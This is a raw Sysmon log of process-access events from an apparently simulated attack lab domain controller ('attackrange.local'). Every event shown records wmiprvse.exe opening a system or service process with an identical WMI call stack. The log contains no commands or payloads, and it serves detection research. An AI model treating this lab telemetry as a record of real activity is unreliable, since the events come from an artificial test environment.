15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026521Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026520Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026519Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026518Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026517Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026516Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026515Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026514Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026513Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026512Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026511Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026510Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026509Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026508Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026507Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026506Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026505Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026504Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026503Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026502Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 